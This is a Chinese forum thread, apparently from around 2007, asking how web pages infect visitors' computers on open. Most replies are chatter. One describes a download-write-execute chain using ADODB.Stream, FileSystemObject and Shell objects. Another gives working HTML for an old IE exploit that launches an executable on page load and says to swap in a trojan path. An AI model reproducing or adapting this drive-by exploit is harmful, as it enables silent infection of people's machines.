请问一打开网页就中招的病毒究竟是怎样制作成的?
有的网页的页面,只要是一打开浏览,马上就中招,我刚刚还打开过一个名叫"我爱电视剧"的网站,忽忽地马上中了招,刚清理完。想请问一下各位大虾,它们这些网站连浏览一下都会中招,究竟是怎么做到的?
我是想从编程的角度来探讨它程序上的实现, 不想过多讨论怎样防范它,关于怎样防范这类网页病毒,网上资料已经够多的了,但很少有人分析过这些一打开网页就中招的放毒方式在编程上是怎样实现的,我要的是编程上实现的细节,请各位高手指点一下,不尽感激! --------------------编程问答-------------------- Depends on the browser, local security policy and the firewall settings.
--------------------编程问答-------------------- 利用的是浏览器的漏洞。如果打了最新的补丁,一般都没问题。 --------------------编程问答-------------------- UP --------------------编程问答-------------------- jiangsheng(蒋晟.Net[MVP]) ( ) 信誉:100 Blog 2007-01-13 08:57:58 得分: 0
Depends on the browser, local security policy and the firewall settings.
Top
jamesking(James) ( ) 信誉:100 Blog 2007-01-13 11:29:16 得分: 0
利用的是浏览器的漏洞。如果打了最新的补丁,一般都没问题。
---------------
不是哦.
我用的ie7的安全设置没问题,补丁也最新.我并不想过多探讨怎么防范它,我本人也是黑客高手,有6年黑客经验,3年网管,将近10年程序员经验,我不是初哥啊.但我不知道它具体怎么编程实现的,一浏览网页,就在user profile的Local Settings\Temporary Internet Files缓存文件夹狂下那些病毒,然后就开始疯狂拷贝和执行,他编程手段不一般,最新补丁和防火墙挡不住的,有的连vista用户帐号控制(UAC)也能绕过.我想知道编程上怎么实现的? 谁给点资料,连接什么的,也行.不要再教我怎么防范了,我需要的是知道他怎么编的.谢谢高手参与. --------------------编程问答-------------------- UP --------------------编程问答-------------------- LZ所说的黑客高手恐怕是自诩的吧,呵呵。
网页木马利用漏洞往你硬盘里塞个下载者,然后....
貌似许多流氓软件也是这样做di。
建议你搜索一下冰狐浪子的网马,看看源代码就清楚了,
或者你也可以去forum.eviloctal.com那里找,好象以前有过相关讨论 --------------------编程问答-------------------- 病毒本来就是牛人做出来的
你也许是自身的程序员,但是不见得是系统内核的熟练程序员
ie的插件, 系统的vxd程序, 各种服务程序, 都可以用来得到你说的这种效果
--------------------编程问答-------------------- 建议你去看一下XSS相关技术。请记得给我加分。 --------------------编程问答-------------------- 给个url 我想去看看。
--------------------编程问答-------------------- benjiam(今晚打老虎) ( ) 信誉:100 Blog 2007-1-24 18:02:07 得分: 0
给个url 我想去看看。
-----------------
同意啊,给个url去看看,好给分啊!
--------------------编程问答-------------------- 好贴,继续关注! --------------------编程问答-------------------- IE的不足 :) --------------------编程问答-------------------- 1、如果用firefox和opera不能让你的电脑中招,那么可以肯定是IE的漏洞
2、如果用firefox和opera还能让你的电脑中招,那么建议换linux和netbsd
3、如果用linux和netbsd不能让你的电脑中招,那么可以肯定是windows操作系统的漏洞
4、如果用linux和netbsd还能让你的电脑中招,那么他一定是神仙!!! --------------------编程问答-------------------- 我以前大致分析了一下,其实就是用脚本创建com对象,好像是用了AdoStream什么的,来连接到病毒网站,下载病毒,然后创建FileSystemObject对象,写到硬盘上去,再用Shell对象执行,就是这样了,不过具体对象名我可能记得不准确。网页都是有源代码的,楼主身为一个黑客高手谅来也不是浪的虚名的,难道不能自己分析一下吗 --------------------编程问答-------------------- 这个漏洞被补上很久了 --------------------编程问答-------------------- up --------------------编程问答-------------------- 你都做的什么黑客啊?每一个漏洞都有可能让你中招,每一个漏洞的利用程序都会有所不同。另外,即使没有漏洞,如果你的安全设置方面有问题,网页也是可以访问你的计算机的。建议你不要再自称黑客了 --------------------编程问答-------------------- up --------------------编程问答-------------------- 你了解activex吗,会写activex程序吗,对com又了解多少,不了解com就不算真正的程序员。 --------------------编程问答-------------------- 你了解activex吗,会写activex程序吗,对com又了解多少,不了解com就不算真正的程序员。
//////////////////////////////////
微软的那些操作系统开发人员看来都不是真正的程序员
当你打开网页的时候,有些网页会自动播放flash什么的,而IE的漏洞就是没有检查播放文件的格式,因此有些网页将flash替换成病毒软件的话,你就中招了。原理大概就是这样。 --------------------编程问答-------------------- 比如在网页上写了恶意代码,你一打开的时候,它会执行下载程序到你的硬盘并执行,或者直接就利用IE的漏洞
IE的漏洞建了一个帐户了,等等 --------------------编程问答-------------------- 你了解activex吗,会写activex程序吗,对com又了解多少,不了解com就不算真正的程序员。
这话说的,真是,哎。
--------------------编程问答-------------------- 我以前上网常常中招,自从装了Kaspersky后一直没有中过招了! --------------------编程问答-------------------- 下面代码保存为html,打开就自动打开系统自带的记事本。
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security>
<exploit>
<![CDATA[
<object id="oFile" classid="clsid:88888888-8888-8888-8888-888888888888" codebase="C:\WINDOWS\NOTEPAD.EXE">
</object>
]]>
</exploit>
</security>
</xml>
类似的,你把路径指向你要执行的木马地址。当你打开该页时,自动运行木马。
--------------------编程问答--------------------
这样的方法可以用吗?连接上的时候,IE会不会提示有个文件要自动下载? --------------------编程问答-------------------- 如果IE没打上补丁的话,换句话说是你IE存在漏洞的话,是没提示的。
如果IE是补丁全部打上,而且没设置插件拦截的话,这个是可以用的。 --------------------编程问答-------------------- --------------------编程问答-------------------- up --------------------编程问答-------------------- 等待牛人来答. --------------------编程问答-------------------- 接分先!
补充:云计算 , 云安全
